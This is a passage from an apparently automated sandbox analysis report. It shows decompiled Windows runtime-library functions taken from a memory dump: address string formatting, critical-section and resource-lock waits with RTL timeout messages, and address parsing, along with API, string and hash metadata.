                                                                                                                                                  							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                  						}
                                                                                                                                                  						_t54 = E00C913CB(_t53, _t28);
                                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                                  							_t34 = E00C87707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                  							_t58 = _t58 + 0x10;
                                                                                                                                                  							_t54 = _t54 + _t34 * 2;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                                  							_t40 = E00C87707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                  							_t58 = _t58 + 0x10;
                                                                                                                                                  							_t54 = _t54 + _t40 * 2;
                                                                                                                                                  						}
                                                                                                                                                  						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                  						 *_t52 = _t53;
                                                                                                                                                  						if( *_t52 < _t53) {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						} else {
                                                                                                                                                  							E00C52340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                  							_t26 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return E00C5E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                  			}





















                                                                                                                                                  APIs
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 00CBEA22
                                                                                                                                                    • Part of subcall function 00C913CB: ___swprintf_l.LIBCMT ref: 00C9146B
                                                                                                                                                    • Part of subcall function 00C913CB: ___swprintf_l.LIBCMT ref: 00C91490
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 00C9156D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: 84390689a668e2daa45113ea1a600f095559f2c79c024a2fd6b9d4b9def321b2
                                                                                                                                                  • Instruction ID: 0ae09276fd9825d3f8824fccceeaa9ff5834ee35147f89cc031e5abc7612de02
                                                                                                                                                  • Opcode Fuzzy Hash: 84390689a668e2daa45113ea1a600f095559f2c79c024a2fd6b9d4b9def321b2
                                                                                                                                                  • Instruction Fuzzy Hash: E921C37290021A9BCF21EE54CC4AAEF73BCEB50700F5A4161FC56D3141EB70EA589BE1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E00C753A5(signed int _a4, char _a8) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t32;
                                                                                                                                                  				signed int _t37;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				signed int _t42;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				signed int _t49;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				signed int _t57;
                                                                                                                                                  				signed int _t64;
                                                                                                                                                  				signed int _t71;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				intOrPtr _t78;
                                                                                                                                                  				signed int* _t79;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				signed int _t86;
                                                                                                                                                  				signed int _t92;
                                                                                                                                                  				void* _t104;
                                                                                                                                                  				void* _t105;
                                                                                                                                                  
                                                                                                                                                  				_t64 = _a4;
                                                                                                                                                  				_t32 =  *(_t64 + 0x28);
                                                                                                                                                  				_t71 = _t64 + 0x28;
                                                                                                                                                  				_push(_t92);
                                                                                                                                                  				if(_t32 < 0) {
                                                                                                                                                  					_t78 =  *[fs:0x18];
                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                  					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					} else {
                                                                                                                                                  						__eflags = _t32 | 0xffffffff;
                                                                                                                                                  						asm("lock xadd [ecx], eax");
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					L3:
                                                                                                                                                  					_push(_t86);
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L4:
                                                                                                                                                  						__eflags = _t32;
                                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _a8;
                                                                                                                                                  						if(_a8 == 0) {
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							return 0;
                                                                                                                                                  						} else {
                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                  							_t79 = _t64 + 0x24;
                                                                                                                                                  							_t71 = 1;
                                                                                                                                                  							asm("lock xadd [eax], ecx");
                                                                                                                                                  							_t32 =  *(_t64 + 0x28);
                                                                                                                                                  							_a4 = _t32;
                                                                                                                                                  							__eflags = _t32;
                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                  								L19:
                                                                                                                                                  								_t86 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                  									asm("sbb esi, esi");
                                                                                                                                                  									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00d301c0;
                                                                                                                                                  									_push(_t92);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t37 = E00C4F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                  									__eflags = _t37 - 0x102;
                                                                                                                                                  									if(_t37 != 0x102) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t71 =  *(_t92 + 4);
                                                                                                                                                  									_t85 =  *_t92;
                                                                                                                                                  									_t51 = E00C94FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                  									_push(_t85);
                                                                                                                                                  									_push(_t51);
                                                                                                                                                  									E00CA3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                  									E00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                  									_t86 = _t86 + 1;
                                                                                                                                                  									_t105 = _t104 + 0x28;
                                                                                                                                                  									__eflags = _t86 - 2;
                                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                                  										E00CD217A(_t71, __eflags, _t64);
                                                                                                                                                  									}
                                                                                                                                                  									_push("RTL: Re-Waiting\n");
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(0x65);
                                                                                                                                                  									E00CA3F92();
                                                                                                                                                  									_t104 = _t105 + 0xc;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t37;
                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                  									_push(_t37);
                                                                                                                                                  									E00C93915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									_t40 =  *_t71;
                                                                                                                                                  									 *_t71 = 0;
                                                                                                                                                  									__eflags = _t40;
                                                                                                                                                  									if(_t40 == 0) {
                                                                                                                                                  										L1:
                                                                                                                                                  										_t42 = E00C75384(_t92 + 0x24);
                                                                                                                                                  										if(_t42 != 0) {
                                                                                                                                                  											goto L31;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L2;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                  										_push( &_a4);
                                                                                                                                                  										_push(_t40);
                                                                                                                                                  										_t49 = E00C4F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                  										__eflags = _t49;
                                                                                                                                                  										if(__eflags >= 0) {
                                                                                                                                                  											goto L1;
                                                                                                                                                  										} else {
                                                                                                                                                  											_push(_t49);
                                                                                                                                                  											E00C93915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                  											L31:
                                                                                                                                                  											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                  											_push( &_a4);
                                                                                                                                                  											_push(1);
                                                                                                                                                  											_t42 = E00C4F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                  											__eflags = _t42;
                                                                                                                                                  											if(__eflags >= 0) {
                                                                                                                                                  												L2:
                                                                                                                                                  												return _t42;
                                                                                                                                                  											} else {
                                                                                                                                                  												_push(_t42);
                                                                                                                                                  												E00C93915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                  												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                  												_push( &_a4);
                                                                                                                                                  												_push(1);
                                                                                                                                                  												_t42 = E00C4F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                  												__eflags = _t42;
                                                                                                                                                  												if(__eflags >= 0) {
                                                                                                                                                  													goto L2;
                                                                                                                                                  												} else {
                                                                                                                                                  													_push(_t42);
                                                                                                                                                  													_t45 = E00C93915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                  													asm("int3");
                                                                                                                                                  													while(1) {
                                                                                                                                                  														_t74 = _t45;
                                                                                                                                                  														__eflags = _t45 - 1;
                                                                                                                                                  														if(_t45 != 1) {
                                                                                                                                                  															break;
                                                                                                                                                  														}
                                                                                                                                                  														_t86 = _t86 | 0xffffffff;
                                                                                                                                                  														_t45 = _t74;
                                                                                                                                                  														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                  														__eflags = _t45 - _t74;
                                                                                                                                                  														if(_t45 != _t74) {
                                                                                                                                                  															continue;
                                                                                                                                                  														} else {
                                                                                                                                                  															_t46 =  *[fs:0x18];
                                                                                                                                                  															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                  															return _t46;
                                                                                                                                                  														}
                                                                                                                                                  														goto L38;
                                                                                                                                                  													}
                                                                                                                                                  													E00C75329(_t74, _t92);
                                                                                                                                                  													_push(1);
                                                                                                                                                  													_t48 = E00C753A5(_t92);
                                                                                                                                                  													return _t48;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									_t32 =  *(_t64 + 0x28);
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_t71 =  *_t79;
                                                                                                                                                  								__eflags = _t71;
                                                                                                                                                  								if(__eflags > 0) {
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t57 = _t71;
                                                                                                                                                  										asm("lock cmpxchg [edi], esi");
                                                                                                                                                  										__eflags = _t57 - _t71;
                                                                                                                                                  										if(_t57 == _t71) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										_t71 = _t57;
                                                                                                                                                  										__eflags = _t57;
                                                                                                                                                  										if(_t57 > 0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t32 = _a4;
                                                                                                                                                  									__eflags = _t71;
                                                                                                                                                  								}
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L19;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L38;
                                                                                                                                                  					}
                                                                                                                                                  					_t71 = _t71 | 0xffffffff;
                                                                                                                                                  					_t32 = 0;
                                                                                                                                                  					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					if(0 != 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L38:
                                                                                                                                                  			}


























                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753d8
                                                                                                                                                  0x00c753e3
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB22F4
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 00CB230B
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CB22FC
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00CB2328
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-871070163
                                                                                                                                                  • Opcode ID: 1b63457b4deaf5c71dfe2874f75162b31c86ebeeac0627d584e6bce17ace3cdc
                                                                                                                                                  • Instruction ID: a6af677decbbb2deddef7e5e6f68afc9d3f6b38bf8382dd3e88eb3e686832f83
                                                                                                                                                  • Opcode Fuzzy Hash: 1b63457b4deaf5c71dfe2874f75162b31c86ebeeac0627d584e6bce17ace3cdc
                                                                                                                                                  • Instruction Fuzzy Hash: 115116716007026BEF15DB68DC81FA673DCEF54364F114229FD18DB291EAB1EE4297A0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E00C7EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                  				short _v66;
                                                                                                                                                  				char _v72;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                  				intOrPtr _t39;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                  				signed int _t44;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  				intOrPtr _t48;
                                                                                                                                                  				signed int _t49;
                                                                                                                                                  				intOrPtr _t50;
                                                                                                                                                  				intOrPtr _t53;
                                                                                                                                                  				signed char _t67;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                                  				intOrPtr _t84;
                                                                                                                                                  				intOrPtr* _t85;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				void* _t92;
                                                                                                                                                  				void* _t93;
                                                                                                                                                  
                                                                                                                                                  				_t80 = __edi;
                                                                                                                                                  				_t75 = __edx;
                                                                                                                                                  				_t70 = __ecx;
                                                                                                                                                  				_t84 = _a4;
                                                                                                                                                  				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                  					E00C6DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                  					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                  				}
                                                                                                                                                  				_push(0);
                                                                                                                                                  				__eflags = _t38 - 0xffffffff;
                                                                                                                                                  				if(_t38 == 0xffffffff) {
                                                                                                                                                  					_t39 =  *0xd3793c; // 0x0
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(_t84);
                                                                                                                                                  					_t40 = E00C516C0(_t39);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t40 = E00C4F9D4(_t38);
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t85);
                                                                                                                                                  				__eflags = _t40;
                                                                                                                                                  				if(__eflags < 0) {
                                                                                                                                                  					_push(_t40);
                                                                                                                                                  					E00C93915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                  					asm("int3");
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L21:
                                                                                                                                                  						_t76 =  *[fs:0x18];
                                                                                                                                                  						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                  						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                  						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                  							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                  							_v66 = 0x1722;
                                                                                                                                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                  							_t76 =  &_v72;
                                                                                                                                                  							_push( &_v72);
                                                                                                                                                  							_v28 = _t85;
                                                                                                                                                  							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                  							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                  							_push(0x10);
                                                                                                                                                  							_push(0x20402);
                                                                                                                                                  							E00C501A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t43 = _v8;
                                                                                                                                                  							_push(_t80);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							__eflags = _t43 - 0xffffffff;
                                                                                                                                                  							if(_t43 == 0xffffffff) {
                                                                                                                                                  								_t71 =  *0xd3793c; // 0x0
                                                                                                                                                  								_push(_t85);
                                                                                                                                                  								_t44 = E00C51F28(_t71);
                                                                                                                                                  							} else {
                                                                                                                                                  								_t44 = E00C4F8CC(_t43);
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t44 - 0x102;
                                                                                                                                                  							if(_t44 != 0x102) {
                                                                                                                                                  								__eflags = _t44;
                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                  									_push(_t44);
                                                                                                                                                  									E00C93915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									E00CD2306(_t85);
                                                                                                                                                  									__eflags = _t67 & 0x00000002;
                                                                                                                                                  									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                  										_t7 = _t67 + 2; // 0x4
                                                                                                                                                  										_t72 = _t7;
                                                                                                                                                  										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                  										__eflags = _t67 - _t67;
                                                                                                                                                  										if(_t67 == _t67) {
                                                                                                                                                  											E00C7EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									return 0;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eflags = _v24;
                                                                                                                                                  									if(_v24 != 0) {
                                                                                                                                                  										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                  									}
                                                                                                                                                  									return 2;
                                                                                                                                                  								}
                                                                                                                                                  								goto L36;
                                                                                                                                                  							}
                                                                                                                                                  							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                  							_push(_t67);
                                                                                                                                                  							_t46 = E00C94FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                  							_push(_t77);
                                                                                                                                                  							E00CA3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                  							_t48 =  *_t85;
                                                                                                                                                  							_t92 = _t91 + 0x18;
                                                                                                                                                  							__eflags = _t48 - 0xffffffff;
                                                                                                                                                  							if(_t48 == 0xffffffff) {
                                                                                                                                                  								_t49 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                  							}
                                                                                                                                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                  							_push(_t49);
                                                                                                                                                  							_t50 = _v12;
                                                                                                                                                  							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                  							_push(_t85);
                                                                                                                                                  							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                  							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                  							E00CA3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                  							_t53 =  *_t85;
                                                                                                                                                  							_t93 = _t92 + 0x20;
                                                                                                                                                  							_t67 = _t67 + 1;
                                                                                                                                                  							__eflags = _t53 - 0xffffffff;
                                                                                                                                                  							if(_t53 != 0xffffffff) {
                                                                                                                                                  								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                  								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t67 - 2;
                                                                                                                                                  							if(_t67 > 2) {
                                                                                                                                                  								__eflags = _t85 - 0xd320c0;
                                                                                                                                                  								if(_t85 != 0xd320c0) {
                                                                                                                                                  									_t76 = _a4;
                                                                                                                                                  									__eflags = _a4 - _a8;
                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                  										E00CD217A(_t71, __eflags, _t85);
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_push("RTL: Re-Waiting\n");
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push(0x65);
                                                                                                                                                  							_a8 = _a4;
                                                                                                                                                  							E00CA3F92();
                                                                                                                                                  							_t91 = _t93 + 0xc;
                                                                                                                                                  							__eflags =  *0x7ffe0382;
                                                                                                                                                  							if( *0x7ffe0382 != 0) {
                                                                                                                                                  								goto L21;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L36;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					return _t40;
                                                                                                                                                  				}
                                                                                                                                                  				L36:
                                                                                                                                                  			}

                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00CB248D
                                                                                                                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00CB24BD
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00CB24FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-3177188983
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00C8FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _t105;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				char _t114;
                                                                                                                                                  				short _t115;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				signed short* _t119;
                                                                                                                                                  				short _t120;
                                                                                                                                                  				char _t122;
                                                                                                                                                  				void* _t127;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  				signed int _t136;
                                                                                                                                                  				intOrPtr _t143;
                                                                                                                                                  				signed int _t158;
                                                                                                                                                  				signed short* _t164;
                                                                                                                                                  				signed int _t167;
                                                                                                                                                  				void* _t170;
                                                                                                                                                  
                                                                                                                                                  				_t158 = 0;
                                                                                                                                                  				_t164 = _a4;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v28 = 0;
                                                                                                                                                  				_t136 = 0;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                  					if(_t167 == _t158) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t118 = _v20 - _t158;
                                                                                                                                                  					if(_t118 == 0) {
                                                                                                                                                  						if(_t167 == 0x3a) {
                                                                                                                                                  							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                  								break;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t119 =  &(_t164[1]);
                                                                                                                                                  								if( *_t119 != _t167) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t143 = 2;
                                                                                                                                                  								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                  								_v28 = 1;
                                                                                                                                                  								_v8 = _t143;
                                                                                                                                                  								_t136 = _t136 + 1;
                                                                                                                                                  								L47:
                                                                                                                                                  								_t164 = _t119;
                                                                                                                                                  								_v20 = _t143;
                                                                                                                                                  								L14:
                                                                                                                                                  								if(_v24 == _t158) {
                                                                                                                                                  									L19:
                                                                                                                                                  									_t164 =  &(_t164[1]);
                                                                                                                                                  									_t158 = 0;
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v12 == _t158) {
                                                                                                                                                  									if(_v16 > 4) {
                                                                                                                                                  										L29:
                                                                                                                                                  										return 0xc000000d;
                                                                                                                                                  									}
                                                                                                                                                  									_t120 = E00C8EE02(_v24, _t158, 0x10);
                                                                                                                                                  									_t170 = _t170 + 0xc;
                                                                                                                                                  									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                  									_t136 = _t136 + 1;
                                                                                                                                                  									goto L19;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v16 > 3) {
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  								_t122 = E00C8EE02(_v24, _t158, 0xa);
                                                                                                                                                  								_t170 = _t170 + 0xc;
                                                                                                                                                  								if(_t122 > 0xff) {
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L21:
                                                                                                                                                  						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                  							break;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(E00C8685D(_t167, 4) == 0) {
                                                                                                                                                  								if(E00C8685D(_t167, 0x80) != 0) {
                                                                                                                                                  									if(_v12 > 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t127 = 1;
                                                                                                                                                  									_a7 = 1;
